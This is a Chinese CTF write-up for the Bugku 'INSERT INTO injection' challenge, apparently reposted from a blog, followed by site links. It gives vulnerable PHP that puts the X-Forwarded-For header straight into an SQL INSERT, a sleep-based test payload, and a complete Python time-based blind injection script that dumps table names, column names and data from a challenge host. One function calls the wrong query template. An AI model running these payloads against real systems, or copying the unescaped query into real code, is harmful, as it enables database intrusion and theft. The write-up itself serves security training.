Bugku-INSERT INTO 注入

其他 2020-04-02 06:17:31 阅读次数: 0

INSERT INTO 注入

给了源码

error_reporting(0);

function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];

}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

代码逻辑很清晰,把传入的HTTP_X_FORWARDED_FOR的值插入到数据库里

HTTP_X_FORWARDED_FOR通过X-Forwarded-For来传入

但这里需要注意,插入的只是HTTP_X_FORWARDED_FOR里第一个逗号前的部分,所以不能使用逗号

  • 使用select case when x then x else x end语句来代替if(x,x,x)
  • 使用from a for b语句来代替limit a,b

验证语句x-forwarded-For: 1.1.1.1'+(select case when(1) then sleep(4) else 1 end) + '1

然后写脚本爆破就可以了

这个脚本比较全但是很笨重,缺少对错误的处理,实际用的时候有很多地方也是不必要的,可以根据需求自行修改

ps:直接跑基本跑不出来,建议根据思想自己动手写/修改

"""
Title: SQLi_Time
Author: Recol
Date: 2020-04-01
"""
import requests

url = 'http://123.206.87.240:8002/web15/'
table_number_sql = "1.1.1.1'+(select case when((select length(table_name) from information_schema.tables where table_schema=database() limit 1 offset %d)>0)then sleep(4) else 1 end) + '1"
table_length_sql = "1.1.1.1'+(select case when((select length(table_name) from information_schema.tables where table_schema=database() limit 1 offset %d)=%d)then sleep(4) else 1 end) + '1"
table_name_sql = "1.1.1.1'+(select case when(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database() limit 1 offset %d) from %d for 1))=%d)then sleep(4) else 1 end) + '1"
column_number_sql = "1.1.1.1'+(select case when((select length(column_name) from information_schema.columns where table_name='%s' limit 1 offset %d)>0)then sleep(4) else 1 end) + '1"
column_length_sql = "1.1.1.1'+(select case when((select length(column_name) from information_schema.columns where table_name='%s' limit 1 offset %d)=%d)then sleep(4) else 1 end) + '1"
column_name_sql = "1.1.1.1'+(select case when(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='%s' limit 1 offset %d) from %d for 1))=%d)then sleep(4) else 1 end) + '1"
field_number_sql = "1.1.1.1'+(select case when((select length(%s) from %s limit 1 offset %d)>0)then sleep(4) else 1 end) + '1"
field_length_sql = "1.1.1.1'+(select case when((select length(%s) from %s limit 1 offset %d)=%d)then sleep(4) else 1 end) + '1"
field_name_sql = "1.1.1.1'+(select case when(ascii(substr((select group_concat(%s) from %s limit 1 offset %d) from %d for 1))=%d)then sleep(4) else 1 end) + '1"
headers = {
    'X-Forwarded-For': '',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.9 Safari/537.36'
}


def get_table_number():
    for i in range(100):
        sql = table_number_sql % i
        header_ = headers
        header_['X-Forwarded-For'] = sql
        try:
            res = requests.get(url=url, headers=header_, timeout=3)
        except requests.exceptions.ReadTimeout:
            continue
        else:
            print('table_number: ' + str(i + 1))
            return i + 1


def get_table_length(x):
    for i in range(100):
        sql = table_length_sql % (x, i)
        header_ = headers
        header_['X-Forwarded-For'] = sql
        try:
            res = requests.get(url=url, headers=header_, timeout=3)
        except requests.exceptions.ReadTimeout:
            print('table_length: ' + str(i))
            return i


def get_table_name(length, seq):
    name = ''
    for x in range(length + 1):
        for i in range(30, 200):
            sql = table_name_sql % (seq, x, i)
            header_ = headers
            header_['X-Forwarded-For'] = sql
            try:
                res = requests.get(url=url, headers=header_, timeout=3)
            except requests.exceptions.ReadTimeout:
                print(chr(i), end='')
                name += chr(i)
    return name


def get_column_number(table_name):
    for i in range(100):
        sql = column_number_sql % (table_name, i)
        header_ = headers
        header_['X-Forwarded-For'] = sql
        try:
            res = requests.get(url=url, headers=header_, timeout=3)
        except requests.exceptions.ReadTimeout:
            continue
        else:
            print('column_number: ' + str(i + 1))
            return i + 1


def get_column_length(table_name, seq):
    for i in range(100):
        sql = column_length_sql % (table_name, seq, i)
        header_ = headers
        header_['X-Forwarded-For'] = sql
        try:
            res = requests.get(url=url, headers=header_, timeout=3)
        except requests.exceptions.ReadTimeout:
            print('column_length: ' + str(i))
            return i


def get_column_name(length, table_name, seq):
    name = ''
    for x in range(length + 1):
        for i in range(30, 200):
            sql = column_name_sql % (table_name, seq, x, i)
            header_ = headers
            header_['X-Forwarded-For'] = sql
            try:
                res = requests.get(url=url, headers=header_, timeout=3)
            except requests.exceptions.ReadTimeout:
                print(chr(i), end='')
                name += chr(i)
    print(name)
    return name


def get_field_numbers(table_name, column_name):
    for i in range(100):
        sql = field_number_sql % (column_name, table_name, i)
        header_ = headers
        header_['X-Forwarded-For'] = sql
        try:
            res = requests.get(url=url, headers=header_, timeout=3)
        except requests.exceptions.ReadTimeout:
            continue
        else:
            print('field_number: ' + str(i + 1))
            return i + 1


def get_field_length(table_name, column_name, seq):
    for i in range(100):
        sql = field_length_sql % (column_name, table_name, seq, i)
        header_ = headers
        header_['X-Forwarded-For'] = sql
        try:
            res = requests.get(url=url, headers=header_, timeout=3)
        except requests.exceptions.ReadTimeout:
            print('field_length: ' + str(i))
            return i


def get_field_content(column_name, table_name, seq, length):
    name = ''
    for x in range(length + 1):
        for i in range(30, 200):
            sql = column_name_sql % (column_name, table_name, seq, x, i)
            header_ = headers
            header_['X-Forwarded-For'] = sql
            try:
                res = requests.get(url=url, headers=header_, timeout=3)
            except requests.exceptions.ReadTimeout:
                print(chr(i), end='')
                name += chr(i)
    print(name)
    return name


def start():
    table_number = get_table_number()
    res = {}
    for i in range(table_number):
        table_length = get_table_length(i)
        table_name = get_table_name(table_length, i)
        column_number = get_column_number(table_name)
        res[table_name] = {}
        for x in range(column_number):
            column_length = get_column_length(table_name, x)
            column_name = get_column_name(column_length, table_name, x)
            res[table_name][column_name] = []
            field_number = get_field_numbers(table_name, column_name)
            for s in range(field_number):
                field_length = get_field_length(table_name, column_name, s)
                field_content = get_field_content(column_name, table_name, s, field_length)
                res[table_name][column_name].append(field_content)

    print(res)


start()

猜你喜欢

转载自www.cnblogs.com/R3col/p/12617189.html
今日推荐
Linus “吃狗粮”最积极!
开源日报 | Winamp播放器即将开源;生成式AI之战升级第二轮;Linus“吃狗粮”最积极;AI进入泡沫前期;吴泳铭为阿里云带来了什么?
NetBSD 禁止提交由 AI 生成的代码
Apache Doris 2.0.10 版本正式发布!
开源日报 | 大模型开战;大模型独角兽被曝卖身;周鸿祎建议谷歌开源所有产品;最大开源AI社区提供1000万美元共享GPU
开源日报 | Chrome内置Gemini的意义不在于Gemini;中国AI追随之路的五大误区;ECharts创始人“下海”养鱼;谷歌I/O开发者大会什么都有,只是没有惊喜
微软回应中国区AI团队“打包赴美”传闻
周排行
SVN服务端安装在阿里云
实战 | 相机标定
webpack核心概念
note20——》只要肯低头吃苦,人生就会有救
PAT甲级 1062 Talent and Virtue (25 分)排序
NG Toolset开发笔记--5GNR Resource Grid(26)
如何对待上司
oracle命令
第9章 STL迭代器
logstash使用es映射模板
每日归档
更多
2024-05-20(36)
2024-05-19(0)
2024-05-18(4)
2024-05-17(34)
2024-05-16(6)
2024-05-15(24)
2024-05-14(0)
2024-05-13(18)
2024-05-12(0)
2024-05-11(38)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022